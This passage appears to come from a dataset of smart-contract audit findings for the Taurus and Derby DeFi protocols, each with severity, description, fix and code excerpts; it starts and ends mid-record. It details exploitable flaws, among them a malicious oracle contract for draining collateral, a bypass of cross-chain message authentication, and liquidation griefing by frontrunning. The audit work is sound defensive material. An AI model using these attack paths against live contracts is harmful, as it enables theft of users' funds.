0%-100%.\\nTherefore the fix is to simply check that `_rewardProportion` is not bigger than 1e18:\\n```\\ndiff --git a/taurus-contracts/contracts/Vault/SwapHandler.sol b/taurus-contracts/contracts/Vault/SwapHandler.sol\\nindex c04e3a4..ab5064b 100644\\n--- a/taurus-contracts/contracts/Vault/SwapHandler.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/taurus-contracts/contracts/Vault/SwapHandler.sol\\n@@ -59,6 // Add the line below\\n59,10 @@ abstract contract SwapHandler is FeeMapping, TauDripFeed {\\n revert zeroAmount();\\n }\\n \\n// Add the line below\\n if (_rewardProportion > Constants.PERCENT_PRECISION) [\\n// Add the line below\\n revert invalidRewardProportion();\\n// Add the line below\\n ]\\n// Add the line below\\n\\n // Get and validate swap adapter address\\n address swapAdapterAddress = SwapAdapterRegistry(controller).swapAdapters(_swapAdapterHash);\\n if (swapAdapterAddress == address(0)) {\\n```\\nчA `keeper` can escalate his privileges and erase all debt. 
This means that `TAU` will not be backed by any collateral anymore and will be worthless.ч```\\n_withholdTau((tauReturned * _rewardProportion) / Constants.PERCENT_PRECISION);\\n```\\n -`swap()` will be reverted if `path` has more tokens.чmediumч`swap()` will be reverted if `path` has more tokens, the keepers will not be able to successfully call `swapForTau()`.\\nIn test/SwapAdapters/00_UniswapSwapAdapter.ts:\\n```\\n // Get generic swap parameters\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [\"0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\", \"0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\"],\\n [3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n\\nWe will get:\\n```\\n000000000000000000000000000000000000000000000000000000024f49cbca\\n0000000000000000000000000000000000000000000000056bc75e2d63100000\\n0000000000000000000000000000000000000000000000055de6a779bbac0000\\n0000000000000000000000000000000000000000000000000000000000000080\\n000000000000000000000000000000000000000000000000000000000000002b\\nyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy000bb8zzzzzzzzzzzzzzzzzz\\nzzzzzzzzzzzzzzzzzzzzzz000000000000000000000000000000000000000000\\n```\\n\\nThen the `swapOutputToken` is `_swapData[length - 41:length - 21]`.\\nBut if we have more tokens in path:\\n```\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [\"0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\", \"0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\", \"0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\"],\\n [3000, 3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n 
).swapData;\\n```\\n\\n```\\n000000000000000000000000000000000000000000000000000000024f49cbca\\n0000000000000000000000000000000000000000000000056bc75e2d63100000\\n0000000000000000000000000000000000000000000000055de6a779bbac0000\\n0000000000000000000000000000000000000000000000000000000000000080\\n0000000000000000000000000000000000000000000000000000000000000042\\nxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx000bb8yyyyyyyyyyyyyyyyyy\\nyyyyyyyyyyyyyyyyyyyyyy000bb8zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\\nzzzz000000000000000000000000000000000000000000000000000000000000\\n```\\n\\n`swapOutputToken` is `_swapData[length - 50:length - 30]`, the `swap()` function will be reverted.чLimit the swap pools, or check if the balance of `_outputToken` should exceed `_amountOutMinimum`.чThe keepers will not be able to successfully call `SwapHandler.swapForTau()`. Someone will get a reverted transaction if they misuse `UniswapSwapAdapter`.ч```\\n // Get generic swap parameters\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [\"0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\", \"0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\"],\\n [3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n -Mint limit is not reduced when the Vault is burning TAUчmediumчUpon burning TAU, it incorrectly updates the `currentMinted` when Vault is acting on behalf of users.\\nWhen the burn of `TAU` is performed, it calls `_decreaseCurrentMinted` to reduce the limit of tokens minted by the Vault:\\n```\\n function _decreaseCurrentMinted(address account, uint256 amount) internal virtual {\\n // If the burner is a vault, subtract burnt TAU from its currentMinted.\\n // This has a few highly unimportant edge cases which can generally be rectified by increasing the relevant vault's mintLimit.\\n uint256 accountMinted = currentMinted[account];\\n if (accountMinted >= amount) {\\n currentMinted[msg.sender] = accountMinted - amount;\\n }\\n }\\n```\\n\\nThe issue is that it subtracts 
`accountMinted` (which is currentMinted[account]) from `currentMinted[msg.sender]`. When the vault is burning tokens on behalf of the user, the `account` != `msg.sender` meaning the `currentMinted[account]` is 0, and thus the `currentMinted` of Vault will be reduced by 0 making it pretty useless.\\nAnother issue is that users can transfer their `TAU` between accounts, and then `amount > accountMinted` will not be triggered.чA simple solution would be to:\\n```\\n uint256 accountMinted = currentMinted[msg.sender];\\n```\\n\\nBut I suggest revisiting and rethinking this function altogether.ч`currentMinted` is incorrectly decreased upon burning so vaults do not get more space to mint new tokens.ч```\\n function _decreaseCurrentMinted(address account, uint256 amount) internal virtual {\\n // If the burner is a vault, subtract burnt TAU from its currentMinted.\\n // This has a few highly unimportant edge cases which can generally be rectified by increasing the relevant vault's mintLimit.\\n uint256 accountMinted = currentMinted[account];\\n if (accountMinted >= amount) {\\n currentMinted[msg.sender] = accountMinted - amount;\\n }\\n }\\n```\\n -Account can not be liquidated when price fall by 99%.чmediumчLiquidation fails when price fall by 99%.\\n`_calcLiquidation()` method has logic related to liquidations. This method calculate total liquidation discount, collateral to liquidate and liquidation surcharge. All these calculations looks okay in normal scenarios but there is an edge case when liquidation fails if price crashes by 99% or more. 
In such scenario `collateralToLiquidateWithoutDiscount` will be very large and calculated liquidation surcharge becomes greater than `collateralToLiquidate`\\n```\\nuint256 collateralToLiquidateWithoutDiscount = (_debtToLiquidate * (10 ** decimals)) / price;\\ncollateralToLiquidate = (collateralToLiquidateWithoutDiscount * totalLiquidationDiscount) / Constants.PRECISION;\\nif (collateralToLiquidate > _accountCollateral) {\\n collateralToLiquidate = _accountCollateral;\\n}\\nuint256 liquidationSurcharge = (collateralToLiquidateWithoutDiscount * LIQUIDATION_SURCHARGE) / Constants.PRECISION\\n```\\n\\nContract revert from below line hence liquidation will fail in this scenario.\\n```\\nuint256 collateralToLiquidator = collateralToLiquidate - liquidationSurcharge;\\n```\\nчPresently liquidation surcharge is calculated on `collateralToLiquidateWithoutDiscount`. Project team may want to reconsider this logic and calculate surcharge on `collateralToLiquidate` instead of `collateralToLiquidateWithoutDiscount`. This will be business decision but easy fix\\nAnother option is you may want to calculate surcharge on `Math.min(collateralToLiquidate, collateralToLiquidateWithoutDiscount)`.\\n```\\n uint256 collateralToTakeSurchargeOn = Math.min(collateralToLiquidate, collateralToLiquidateWithoutDiscount);\\n uint256 liquidationSurcharge = (collateralToTakeSurchargeOn * LIQUIDATION_SURCHARGE) / Constants.PRECISION;\\n return (collateralToLiquidate, liquidationSurcharge);\\n```\\nчLiquidation fails when price crash by 99% or more. 
Expected behaviour is that liquidation should be successful in all scenarios.ч```\\nuint256 collateralToLiquidateWithoutDiscount = (_debtToLiquidate * (10 ** decimals)) / price;\\ncollateralToLiquidate = (collateralToLiquidateWithoutDiscount * totalLiquidationDiscount) / Constants.PRECISION;\\nif (collateralToLiquidate > _accountCollateral) {\\n collateralToLiquidate = _accountCollateral;\\n}\\nuint256 liquidationSurcharge = (collateralToLiquidateWithoutDiscount * LIQUIDATION_SURCHARGE) / Constants.PRECISION\\n```\\n -Protocol is will not work on most of the supported blockchains due to hardcoded WETH contract address.чmediumчThe WETH address is hardcoded in the `Swap` library.\\nAs stated in the README.md, the protocol will be deployed on the following EVM blockchains - Ethereum Mainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain. While the project has integration tests with an ethereum mainnet RPC, they don't catch that on different chains like for example Polygon saveral functionallities will not actually work because of the hardcoded WETH address in the Swap.sol library:\\n```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\nчThe WETH variable should be immutable in the Vault contract instead of a constant in the Swap library and the Wrapped Native Token contract address should be passed in the Vault constructor on each separate deployment.чProtocol will not work on most of the supported blockchains.ч```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n -A malicious admin can steal all users collateralчmediumчAccording to Taurus contest details, all roles, including the admin `Multisig`, should not be able to drain users collateral.\\n```\\n2. Multisig. Trusted with essentially everything but user collateral. 
\\n```\\n\\nAs shown of `updateWrapper()` function of `PriceOracleManager.sol`, the admin (onlyOwner) can update any price oracle `_wrapperAddress` for any `_underlying` collateral without any restrictions (such as timelock).\\n```\\nFile: taurus-contracts\\contracts\\Oracle\\PriceOracleManager.sol\\n function updateWrapper(address _underlying, address _wrapperAddress) external override onlyOwner {\\n if (!_wrapperAddress.isContract()) revert notContract();\\n if (wrapperAddressMap[_underlying] == address(0)) revert wrapperNotRegistered(_wrapperAddress);\\n\\n wrapperAddressMap[_underlying] = _wrapperAddress;\\n\\n emit WrapperUpdated(_underlying, _wrapperAddress);\\n }\\n```\\n\\nHence, admin can set a malicious price oracle like\\n```\\ncontract AttackOracleWrapper is IOracleWrapper, Ownable {\\n address public attacker;\\n IGLPManager public glpManager;\\n\\n constructor(address _attacker, address glp) {\\n attacker = _attacker;\\n glpManager = IGLPManager(glp);\\n }\\n\\n function getExternalPrice(\\n address _underlying,\\n bytes calldata _flags\\n ) external view returns (uint256 price, uint8 decimals, bool success) {\\n if (tx.origin == attacker) {\\n return (1, 18, true); // @audit a really low price resulting in the liquidation of all positions\\n } else {\\n uint256 price = glpManager.getPrice();\\n return (price, 18, true);\\n }\\n }\\n}\\n```\\n\\nThen call `liquidate()` to drain out users collateral with negligible $TAU cost.\\n```\\nFile: taurus-contracts\\contracts\\Vault\\BaseVault.sol\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n 
if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n\\n // Check that collateral received is sufficient for liquidator\\n uint256 collateralToLiquidator = collateralToLiquidate - liquidationSurcharge;\\n if (collateralToLiquidator < (_debtAmount * _minExchangeRate) / Constants.PRECISION) {\\n revert insufficientCollateralLiquidated(_debtAmount, collateralToLiquidator);\\n }\\n\\n // Update user info\\n userDetails[_account].collateral = accDetails.collateral - collateralToLiquidate;\\n userDetails[_account].debt = accDetails.debt - _debtAmount;\\n\\n // Burn liquidator's Tau\\n TAU(tau).burnFrom(msg.sender, _debtAmount);\\n\\n // Transfer part of _debtAmount to liquidator and Taurus as fees for liquidation\\n IERC20(collateralToken).safeTransfer(msg.sender, collateralToLiquidator);\\n IERC20(collateralToken).safeTransfer(\\n Controller(controller).addressMapper(Constants.FEE_SPLITTER),\\n liquidationSurcharge\\n );\\n\\n emit AccountLiquidated(msg.sender, _account, collateralToLiquidate, liquidationSurcharge);\\n\\n return true;\\n }\\n```\\nчupdate of price oracle should be restricted with a `timelock`.чA malicious admin can steal all users collateralч```\\n2. Multisig. Trusted with essentially everything but user collateral. 
\\n```\\n -User can prevent liquidations by frontrunning the tx and slightly increasing their collateralчmediumчUser can prevent liquidations by frontrunning the tx and decreasing their debt so that the liquidation transaction reverts.\\nIn the liquidation transaction, the caller has to specify the amount of debt they want to liquidate, `_debtAmount`. The maximum value for that parameter is the total amount of debt the user holds:\\n```\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n```\\n\\nIn `_calcLiquidation()`, the contract determines how much collateral to liquidate when `_debtAmount` is paid by the caller. 
In that function, there's a check that reverts if the caller tries to liquidate more than they are allowed to depending on the position's health.\\n```\\n function _calcLiquidation(\\n uint256 _accountCollateral,\\n uint256 _accountDebt,\\n uint256 _debtToLiquidate\\n ) internal view returns (uint256 collateralToLiquidate, uint256 liquidationSurcharge) {\\n // // rest of code \\n \\n // Revert if requested liquidation amount is greater than allowed\\n if (\\n _debtToLiquidate >\\n _getMaxLiquidation(_accountCollateral, _accountDebt, price, decimals, totalLiquidationDiscount)\\n ) revert wrongLiquidationAmount();\\n```\\n\\nThe goal is to get that if-clause to evaluate to `true` so that the transaction reverts. To modify your position's health you have two possibilities: either you increase your collateral or decrease your debt. So instead of preventing the liquidation by pushing your position to a healthy state, you only modify it slightly so that the caller's liquidation transaction reverts.\\nGiven that Alice has:\\n100 TAU debt\\n100 Collateral (price = $1 so that collateralization rate is 1) Her position can be liquidated. 
The max value is:\\n```\\n function _getMaxLiquidation(\\n uint256 _collateral,\\n uint256 _debt,\\n uint256 _price,\\n uint8 _decimals,\\n uint256 _liquidationDiscount\\n ) internal pure returns (uint256 maxRepay) {\\n // Formula to find the liquidation amount is as follows\\n // [(collateral * price) - (liqDiscount * liqAmount)] / (debt - liqAmount) = max liq ratio\\n // Therefore\\n // liqAmount = [(max liq ratio * debt) - (collateral * price)] / (max liq ratio - liqDiscount)\\n maxRepay =\\n ((MAX_LIQ_COLL_RATIO * _debt) - ((_collateral * _price * Constants.PRECISION) / (10 ** _decimals))) /\\n (MAX_LIQ_COLL_RATIO - _liquidationDiscount);\\n\\n // Liquidators cannot repay more than the account's debt\\n if (maxRepay > _debt) {\\n maxRepay = _debt;\\n }\\n\\n return maxRepay;\\n }\\n```\\n\\n$(1.3e18 * 100e18 - (100e18 * 1e18 * 1e18) / 1e18) / 1.3e18 = 23.07e18$ (leave out liquidation discount for easier math)\\nThe liquidator will probably use the maximum amount they can liquidate and call `liquidate()` with `23.07e18`. Alice frontruns the liquidator's transaction and increases the collateral by `1`. That will change the max liquidation amount to: $(1.3e18 * 100e18 - 101e18 * 1e18) / 1.3e18 = 22.3e18$.\\nThat will cause `_calcLiquidation()` to revert because `23.07e18 > 22.3e18`.\\nThe actual amount of collateral to add or debt to decrease depends on the liquidation transaction. But, generally, you would expect the liquidator to liquidate as much as possible. Thus, you only have to slightly move the position to cause their transaction to revertчIn `_calcLiquidation()` the function shouldn't revert if _debtToLiqudiate > `_getMaxLiquidation()`. 
Instead, just continue with the value `_getMaxLiquidation()` returns.чUser can prevent liquidations by slightly modifying their position without putting it at a healthy state.ч```\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n```\\n -Cross-chain message authentication can be bypassed, allowing an attacker to disrupt the state of vaultsчhighчA malicious actor may send a cross-chain message to an `XProvider` contract and bypass the `onlySource` authentication check. As a result, they'll be able to call any function in the `XProvider` contract that has the `onlySource` modifier and disrupt the state of `XChainController` and all vaults.\\nThe protocol integrates with Connext to handle cross-chain interactions. `XProvider` is a contract that manages interactions between vaults deployed on all supported networks and `XChainController`. `XProvider` is deployed on each of the network where a vault is deployed and is used to send and receive cross-chain messages via Connext. 
`XProvider` is a core contract that handles vault rebalancing, transferring of allocations from Game to `XChainController` and to vaults, transferring of tokens deposited to vaults between vault on different networks. Thus, it's critical that the functions of this contract are only called by authorized actors.\\nTo ensure that cross-chain messages are sent from authorized actors, there's onlySource modifier that's applied to the xReceive function. The modifier checks that the sender of a message is trusted:\\n```\\nmodifier onlySource(address _originSender, uint32 _origin) {\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, \"Not trusted\");\\n _;\\n}\\n```\\n\\nHowever, it doesn't check that `trustedRemoteConnext[_origin]` is set (i.e. it's not the zero address), and `_originSender` can in fact be the zero address.\\nIn Connext, a message can be delivered via one of the two paths: the fast path or the slow path. The fast path is taken when, on the destination, message receiving is not authenticated, i.e. when destination allows receiving of messages from all senders. The slow path is taken when message receiving on the destination is authenticated, i.e. destination doesn't allow arbitrary senders (it checks the sender).\\nSince `XProvider` always checks the sender of a message, only the slow path will be used by Connext to deliver messages to it. However, Connext always tries the fast path first:\\nRouters observing the origin chain with funds on the destination chain will: Simulate the transaction (if this fails, the assumption is that this is a more \"expressive\" crosschain message that requires authentication and so must go through the AMB: the slow path).\\nI.e.
it'll always send a message and see if it reverts on the destination or not: if it does, Connext will switch to the slow path.\\nWhen Connext executes a message on the destination chain in the fast path, it sets the sender address to the zero address:\\n```\\n(bool success, bytes memory returnData) = ExcessivelySafeCall.excessivelySafeCall(\\n _params.to,\\n gasleft() - Constants.EXECUTE_CALLDATA_RESERVE_GAS,\\n 0, // native asset value (always 0)\\n Constants.DEFAULT_COPY_BYTES, // only copy 256 bytes back as calldata\\n abi.encodeWithSelector(\\n IXReceiver.xReceive.selector,\\n _transferId,\\n _amount,\\n _asset,\\n _reconciled ? _params.originSender : address(0), // use passed in value iff authenticated\\n _params.originDomain,\\n _params.callData\\n )\\n);\\n```\\n\\nThus, Connext will try to call the `XProvider.xReceive` function with the `_originSender` argument set to the zero address. And there are situations when the `onlySource` modifier will pass such calls: when the origin network (as specified by the `_origin` argument) is not in the `trustedRemoteConnext` mapping.\\nAccording to the description of the project, it'll be deployed on the following networks:\\nMainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain\\nAnd this is the list of networks supported by Connext:\\nEthereum Mainnet Polygon Optimism Arbitrum One Gnosis Chain BNB Chain\\nThus, a malicious actor can send a message from Gnosis Chain (it's not supported by Derby), and the `onlySource` modifier will pass the message. 
The same is true for any new network supported by Connext in the future and not supported by Derby.чIn the `onlySource` modifier, consider checking that `trustedRemoteConnext[_origin]` doesn't return the zero address:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\nindex 6074fa0..f508a7c 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\n@@ // Remove the line below\\n83,7 // Add the line below\\n83,7 @@ contract XProvider is IXReceiver {\\n * 3) The call to this contract comes from Connext.\\n */\\n modifier onlySource(address _originSender, uint32 _origin) {\\n// Remove the line below\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, \"Not trusted\");\\n// Add the line below\\n require(trustedRemoteConnext[_origin] != address(0) && _originSender == trustedRemoteConnext[_origin] && msg.sender == connext, \"Not trusted\");\\n _;\\n }\\n```\\nчA malicious actor can call `XProvider.xReceive` and any functions of `XProvider` with the `onlySelf` modifier:\\nxReceive allow the caller to call any public function of `XProvider`, but only the ones with the `onlySelf` modifier are authorized;\\nreceiveAllocations can be used to corrupt allocations in the `XChainController` (i.e. 
allocate all tokens only to the protocol the attacker will benefit the most from);\\nreceiveTotalUnderlying can be used to set wrong \"total underlying\" value in the `XChainController` and block rebalancing of vaults (due to an underflow or another arithmetical error);\\nreceiveSetXChainAllocation can be used to set an exchange rate that will allow an attacker to drain a vault by redeeming their LP tokens at a higher rate;\\nreceiveFeedbackToXController can be used to trick the `XChainController` into skipping receiving of funds from a vault;\\nreceiveProtocolAllocationsToVault can be used by an attacker to unilaterally set allocations in a vault, directing funds only to protocol the attacker will benefit from;\\nreceiveRewardsToGame can be used by an attacker to increase the reward per LP token in a protocol the attacker deposited to;\\nfinally, receiveStateFeedbackToVault can allow an attacker to switch off a vault and exclude it from rebalancing.ч```\\nmodifier onlySource(address _originSender, uint32 _origin) {\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, \"Not trusted\");\\n _;\\n}\\n```\\n -Anyone can execute certain functions that use cross chain messages and potentially cancel them with potential loss of funds.чhighчCertain functions that route messages cross chain on the `Game` and `MainVault` contract are unprotected (anyone can call them under the required state of the vaults). The way the cross chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets the `msg.sender` as the `delegate` and `msg.value` as `relayerFee`. There are two possible attack vectors with this:\\nEither an attacker can call the function and set the msg.value to low so it won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). 
This however means special action must be taken to bump the fee in such a case.\\nOr the attacker can call the function (which irreversibly changes the state of the contract) and as the delegate of the `xcall` cancel the message. This functionality is however not yet active on Connext, but the moment it is the attacker will be able to change the state of the contract on the origin chain and make the cross chain message not execute on the destination chain leaving the contracts on the two chains out of synch with possible loss of funds as a result.\\nThe `XProvider` contract's `xsend()` function sets the `msg.sender` as the delegate and `msg.value` as `relayerFee`\\n```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n\\n`xTransfer()` using `msg.sender` as delegate:\\n```\\n IConnext(connext).xcall{value: (msg.value - _relayerFee)}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n _recipient, // _to: address receiving the funds on the destination\\n _token, // _asset: address of the token contract\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n _amount, // _amount: amount of tokens to transfer\\n _slippage, // _slippage: the maximum amount of slippage the user will accept in BPS (e.g. 
30 = 0.3%)\\n bytes(\"\") // _callData: empty bytes because we're only sending funds\\n );\\n }\\n```\\n\\nConnext documentation explaining:\\n```\\nparams.delegate | (optional) Address allowed to cancel an xcall on destination.\\n```\\n\\nConnext documentation seems to indicate this functionality isn't active yet though it isn't clear whether that applies to the cancel itself or only the bridging back the funds to the origin chain.чProvide access control limits to the functions sending message across Connext so only the Guardian can call these functions with the correct msg.value and do not use msg.sender as a delegate but rather a configurable address like the Guardian.чAn attacker can call certain functions which leave the relying contracts on different chains in an unsynched state, with possible loss of funds as a result (mainly on XChainControleler's `sendFundsToVault()` when actual funds are transferred.ч```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n -maxTrainingDeposit can be bypassedчmediumчIt was observed that User can bypass the `maxTrainingDeposit` by transferring balance from one user to another\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** 
decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if User balance exceeds maxTrainingDeposit then request fails (considering training is true)\\nLets say User A has balance of 50 and maxTrainingDeposit is 100\\nIf User A deposit amount 51 then it fails since 50+51<=100 is false\\nSo User A transfer amount 50 to his another account\\nNow when User A deposit, it does not fail since `0+51<=100`чIf user specific limit is required then transfer should be check below:\\n```\\n require(_amountTransferred + balanceRecepient <= maxTrainingDeposit);\\n```\\nчUser can bypass maxTrainingDeposit and deposit more than allowedч```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n -MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFundsчmediumчMainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedAmount. Because of that, shortage can occur, if vault will lose some underlying during cross chain calls and reservedFundswill not be present in the vault.\\n`reservedFunds` is the amount that is reserved to be withdrawn by users. It's increased by `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\n`setXChainAllocation` call is initiated by xController. This call provides vault with information about funds. 
In case if vault should send funds to the xController, then `SendingFundsXChain` state is set, aslo amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, function just pulls needed funds from providers if needed and sends them to xController. It doesn't check that after that amount that is held by vault is enough to cover `reservedFunds`. Because of that next situation can occur.\\n1.Suppose that vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that vault should send 800 tokens to xController(vault allocations is 0) and 200 should be still in the vault in order to cover `reservedFunds`. 4.when vault is going to send 800 tokens(between `setXChainAllocation` and `rebalanceXChain` call), then loss happens and totalUnderlying becomes 800, so currently vault has only 800 tokens in total. 
5.vault sends this 800 tokens to xController and has 0 to cover `reservedFunds`, but actually he should leave this 200 tokens in the vault in this case.\\n```\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think that this is incorrect approach for withdrawing of funds as there is a risk that smth will happen with underlying amount in the providers, so it will be not enough to cover `reservedFunds` and calculations will be broken, users will not be able to withdraw. Same approach is done in `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess that correct approach is not to touch `reservedFunds` amount. In case if you need to send amount to xController, then you need to withdraw it directly from provider. Of course if you have `getVaultBalance` that is bigger than `reservedFunds + amountToSendXChain`, then you can send them directly, without pulling.чYou need to check that after you send funds to xController it's enough funds to cover `reservedFunds`.чReserved funds protection can be brokenч```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n -Game doesn't accrued rewards for previous rebalance period in case if rebalanceBasket is called 
